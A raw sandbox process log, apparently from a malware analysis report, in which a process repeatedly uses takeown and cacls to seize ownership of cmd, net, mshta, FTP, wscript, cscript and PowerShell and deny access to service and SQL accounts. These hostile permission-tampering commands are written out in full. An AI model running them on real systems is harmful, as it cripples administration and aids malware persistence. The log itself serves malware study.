C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:892

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
3⤵
PID:1612

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:692

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
3⤵
PID:1808

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1572

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
3⤵
PID:580

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:872

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
3⤵
PID:836

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
3⤵
PID:1508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1924

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
3⤵
PID:1836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:296

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\net.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:772

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /g Administrators:f
3⤵
PID:640

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /g Users:r
3⤵
PID:320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1476

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /g Administrators:r
3⤵
PID:1128

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:576

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d SERVICE
3⤵
PID:828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2024

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d mssqlserver
3⤵
PID:872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1700

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d "network service"
3⤵
PID:1952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1508

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d system
3⤵
PID:2032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1016

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
3⤵
PID:1684

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\net.exe /a
3⤵
- Modifies file permissions
PID:1920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:700

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
3⤵
PID:296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:480

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
3⤵
PID:1204

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
3⤵
PID:1648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1944

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
3⤵
PID:536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1116

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
3⤵
PID:1808

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
3⤵
PID:1536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1088

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d system
3⤵
PID:1476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1032

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
3⤵
PID:588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1532

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\net1.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1552

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1568

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /g Administrators:f
3⤵
PID:836

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /g Users:r
3⤵
PID:872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1288

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /g Administrators:r
3⤵
PID:1700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2012

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d SERVICE
3⤵
PID:1704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1188

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d mssqlserver
3⤵
PID:1132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1016

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d "network service"
3⤵
PID:1792

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d system
3⤵
PID:1932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1856

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
3⤵
PID:1836

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\net1.exe /a
3⤵
- Modifies file permissions
PID:1272

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
3⤵
PID:1576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:560

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
3⤵
PID:1820

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1612

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:772

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
3⤵
PID:640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1116

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
3⤵
PID:1344

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1240

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
3⤵
PID:568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1032

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
3⤵
PID:636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:564

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d system
3⤵
PID:576

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
3⤵
PID:1572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:580

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\mshta.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:976

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /g Administrators:f
3⤵
PID:872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1288

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /g Users:r
3⤵
PID:1700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2012

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /g Administrators:r
3⤵
PID:1704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2032

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d SERVICE
3⤵
PID:1132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:932

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d mssqlserver
3⤵
PID:1792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1816

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d "network service"
3⤵
PID:1932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:696

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d system
3⤵
PID:1836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:480

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress
3⤵
PID:1404

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\mshta.exe /a
3⤵
- Modifies file permissions
PID:1944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1400

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
3⤵
PID:1820

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:772

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r
3⤵
PID:640

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
3⤵
PID:1344

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1240

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE
3⤵
PID:568

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver
3⤵
PID:636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:828

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"
3⤵
PID:576

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:580

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d system
3⤵
PID:1572

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress
3⤵
PID:1512

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:608

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\FTP.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1408

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /g Administrators:f
3⤵
PID:836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1460

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /g Users:r
3⤵
PID:976

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /g Administrators:r
3⤵
PID:1288

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1952

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1508

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d SERVICE
3⤵
PID:2012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1188

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d mssqlserver
3⤵
PID:2032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1016

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d "network service"
3⤵
PID:2028

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1540

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d system
3⤵
PID:1816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:296

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress
3⤵
PID:696

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\FTP.exe /a
3⤵
- Modifies file permissions
PID:560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1576

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f
3⤵
PID:1404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1648

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r
3⤵
PID:536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:268

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE
3⤵
PID:1536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1808

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r
3⤵
PID:772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1720

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver
3⤵
PID:1476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:672

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"
3⤵
PID:564

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d system
3⤵
PID:1156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1568

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress
3⤵
PID:1548

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\wscript.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /g Administrators:f
3⤵
PID:1628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:996

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /g Users:r
3⤵
PID:2024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1616

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /g Administrators:r
3⤵
PID:872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1876

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d SERVICE
3⤵
PID:1700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:852

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d mssqlserver
3⤵
PID:1704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1684

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d "network service"
3⤵
PID:1132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:932

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d system
3⤵
PID:1792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:700

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress
3⤵
PID:1932

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\wscript.exe /a
3⤵
- Modifies file permissions
PID:520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1836

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f
3⤵
PID:696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1204

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r
3⤵
PID:1944

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1400

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r
3⤵
PID:1648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:692

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE
3⤵
PID:640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:320

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver
3⤵
PID:1808

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1240

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"
3⤵
PID:568

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d system
3⤵
PID:636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:576

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress
3⤵
PID:1156

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\cscript.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1572

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:896

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /g Administrators:f
3⤵
PID:1688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:920

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /g Users:r
3⤵
PID:1628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:836

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /g Administrators:r
3⤵
PID:2024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:976

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d SERVICE
3⤵
PID:872

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1288

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d mssqlserver
3⤵
PID:1700

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d "network service"
3⤵
PID:1704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2012

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d system
3⤵
PID:1132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1920

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress
3⤵
PID:1540

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\cscript.exe /a
3⤵
- Modifies file permissions
PID:1856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:296

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f
3⤵
PID:1272

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:696

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r
3⤵
PID:1204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1944

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r
3⤵
PID:1400

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1648

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE
3⤵
PID:692

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:640

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver
3⤵
PID:1344

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"
3⤵
PID:1476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1532

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d system
3⤵
PID:588

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress
3⤵
PID:1568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1552

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1548

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
3⤵
PID:996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1492

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
3⤵
PID:960

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
3⤵
PID:1616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1924

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
3⤵
PID:1876

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
3⤵
PID:852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1560

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
3⤵
PID:1684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2028

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system
3⤵
PID:1132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1816

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
3⤵
PID:1792

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
3⤵
- Modifies file permissions
PID:1932

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:520

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
3⤵
PID:296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1576

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
3⤵
PID:1612

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
